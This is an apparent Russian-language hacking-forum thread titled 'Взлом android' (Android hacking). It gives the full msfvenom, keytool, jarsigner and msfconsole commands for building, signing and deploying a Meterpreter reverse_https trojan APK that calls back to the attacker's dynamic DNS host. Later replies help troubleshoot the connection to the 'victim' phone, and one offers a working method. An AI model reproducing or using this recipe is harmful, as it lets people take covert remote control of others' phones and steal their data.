Взлом android: msfvenom -p android/...

Тема в разделе "Kali Linux", создана пользователем veterok, 8 окт 2016.

Метки:
  1. veterok

    veterok Member

    Регистрация:
    27 сен 2016
    Сообщения:
    10
    Симпатии:
    2
    Основу взял тут.
    Предварительно пробросил 443 порт на роутере.
    Создал АРК
    Код (Text):
    msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk
    Затем создал подпись
    Код (Text):
    keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
    Подписал APK
    Код (Text):
    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /keys/release-key.keystore example.apk alias_name
    Кинул АРК на телефон (пробовал на android 5.1 и android 4.2 результат одинаков). Все запустилось.

    В терминале как обычно
    Код (Text):
    msfconsole
    ...
    msf > use multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_https
    msf exploit(handler) > set LHOST 192.168.1.3
    msf exploit(handler) > set LPORT 443
    msf exploit(handler) > exploit
    эксплоит стартует, но постояно пишет
    Код (Text):
    Sending stage (957999 bytes) to 192.168.1.2
    Sending stage (957999 bytes) to 192.168.1.2
    Sending stage (957999 bytes) to 192.168.1.2
    ...
    Sending stage (957999 bytes) to 192.168.1.2
    Соединение так и не произошло!!

    Аналогичные действия провожу в Armitage 1.4.11
    И, мазаль тов!!!
    Код (Text):
    meterpreter>
    Но через пары команд жертва перестает реагировать.

    В общем хочется разобраться в двух вопросах:
    1. Почему в терминале не открылась сессия?
    2. Почему через 10-15 мин. отваливается конект в Эрмитаже?
     
    #1 veterok, 8 окт 2016
    Последнее редактирование: 8 окт 2016
    Unkown___ нравится это.
  2. veterok

    veterok Member

    Регистрация:
    27 сен 2016
    Сообщения:
    10
    Симпатии:
    2
    видимо полезных мыслей не у кого на форуме нет по данному вопросу(
     
    Unkown___ нравится это.
  3. Unkown___

    Unkown___ New Member

    Регистрация:
    10 окт 2016
    Сообщения:
    1
    Симпатии:
    0
    Та же самая проблема!
     
  4. Aldo

    Aldo New Member

    Регистрация:
    16 авг 2016
    Сообщения:
    2
    Симпатии:
    0
    Ребят, кто знает, как узнать порт на вируальной машине?
    прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
     
  5. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    218
    Симпатии:
    119
    может потому что виртуалку надо ставить в общую сеть, а не через NAT ?
     
  6. MAdDog719

    MAdDog719 Well-Known Member

    Регистрация:
    16 авг 2016
    Сообщения:
    102
    Симпатии:
    16
    +1, я тож постоянно забываю добавлять в общую сет))))
     
  7. ~~DarkNode~~

    ~~DarkNode~~ Well-Known Member
    Команда форума

    Регистрация:
    19 окт 2016
    Сообщения:
    85
    Симпатии:
    117
    Сначала все нужно тестить на себе или эмуляторе,что бы наглядно видеть что происходить на стороне жертвы.Причин может быть много.Одна из - DroidWall ( или какой то фаерволл для андроида,обычно его ставят для блокировки рекламы на рутированых устройствах,хотя если речь идёт о рядомом юзере то эта версия отпадает)
    Могу по желанию написать статью с рабочим методом через сборку из исходников.
     
  8. MAdDog719

    MAdDog719 Well-Known Member

    Регистрация:
    16 авг 2016
    Сообщения:
    102
    Симпатии:
    16
    Напиши, пожалуйста, будет очень интересно посмотреть /попробовать.
     
  9. OtherMan

    OtherMan New Member

    Регистрация:
    9 ноя 2016
    Сообщения:
    2
    Симпатии:
    0
    под рукой был samsung galaxy s6 edge все делал по выше указанной инструкции такая же проблема (((
    на LG полет нормальный )))
     
Загрузка...

Поделиться этой страницей